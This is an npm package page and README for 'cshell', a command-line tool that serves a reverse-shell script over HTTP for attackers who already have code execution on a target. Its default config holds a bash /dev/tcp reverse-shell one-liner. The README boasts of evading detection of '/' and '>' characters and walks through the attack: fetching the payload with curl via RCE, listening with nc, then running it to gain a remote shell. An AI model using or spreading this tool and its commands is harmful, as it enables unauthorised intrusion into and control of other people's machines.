cshell
v1.1.4
Published
HTTP server for bounce shell downloading
Downloads
17
Maintainers
Readme
CShell
This program could attach the file to the root path of the HTTP server.
Superiority
- Bypass
/
and>
detection and bounce the shell - Use-friendly and highly customized cli tool
Usage
Quick Start
Run
npm i -g cshell
Use
cshell
For more help, please try cshell --help
.
From Source Code
Enter the source code directory. Install the dependencies.
npm ci
Install the cli tool globally.
npm link
Then you can directly use it on console every where. Try:
cshell
For more help, please try cshell --help
.
Configuration
It is recommended to initialize the config by running following command.
cshell-conf <path>
<path>
refers to the config. Each KV is optional, and it will fallback to the default value.
Default config file is as followings.
{
// http server to visit
"server-host": "127.0.0.1",
"server-port": 54180,
// master controller
"shell-host": "127.0.0.1",
"shell-port": 54188,
// static directory
"static": "",
// file path whose content is attached
"file": "",
// content type of the file
"content-type": "text/plain",
// which content if file is not specified
"default-file-content": "bash -i &> /dev/tcp/${{ env.shell_host }}/${{ env.shell_port }} 0>&1"
}
Note that ${{ something }}
in the file content will be replaced to corresponding values. Specially, env
has following sub-values:
server_host
server_port
shell_port
shell_port
Example
Run
cshell --host 12.34.56.78 --port 2020
Show
Server is running at port 2020...
- Try curl -o shell.sh 12.34.56.78:2020 on the target machine.
- Try nc -lvp 2020 on the master controller (12.34.56.78).
DO NOT forget to quit this process!!!
On the target machine to attack, run curl -o shell.sh 12.34.56.78:2020
via RCE. On console displays GET / FROM xx.xx.xx.xx
.
Then we press Ctrl
+C
to quit the program and run nc -lvp 2020
on the master controller.
Attack the target machine by running bash shell.sh
via RCE and we get the shell on the master controller.